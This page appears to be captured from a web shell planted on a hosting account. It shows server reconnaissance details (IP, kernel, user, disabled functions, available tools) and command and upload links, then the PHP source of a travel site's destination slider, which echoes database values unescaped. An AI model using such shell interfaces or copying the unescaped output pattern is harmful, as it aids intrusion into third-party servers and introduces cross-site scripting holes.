Server IP : 103.53.40.154 / Your IP : 52.15.223.239 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/thegloriousadventure.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<div class="destination-area destination-style-one pt-50 "> <div class="container"> <div class="row align-items-center"> <div class="col-lg-8"> <div class="section-head-alpha"> <h2><span>Destination Spots</span></h2> <!--<p>Get The Best Tour With Us</p>--> </div> </div> </div> </div> <div class="container-fluid p-0 overflow-hidden"> <div class="swiper destination-slider-one"> <div class="swiper-wrapper"> <?php $sqlsp = "SELECT * FROM `tbl_tourspots`"; $runsp = mysqli_query($db, $sqlsp) or die("Query Not run"); while ($datasp = mysqli_fetch_assoc($runsp)) { ?> <div class="swiper-slide"> <div class="destination-card-style-one"> <div class="d-card-thumb"> <a href="#"> <img src="<?php echo $wspath?>admin/images/places/<?php echo $datasp['spots_image']; ?>" alt="<?php echo $datasp['spots_name']; ?>" title="<?php echo $datasp['spots_name']; ?>"></a> </div> <div class="d-card-overlay"> <div class="d-card-content"> <h5 class="d-card-title"><a href="#"><?php echo $datasp['spots_name']; ?></a></h5> <!--<div class="d-card-info">--> <!--<div class="place-count">Same Day</div>--> <!--<div class="hotel-count">By Car</div>--> <!--</div>--> </div> </div> </div> </div> <?php } ?> </div> </div> </div> </div>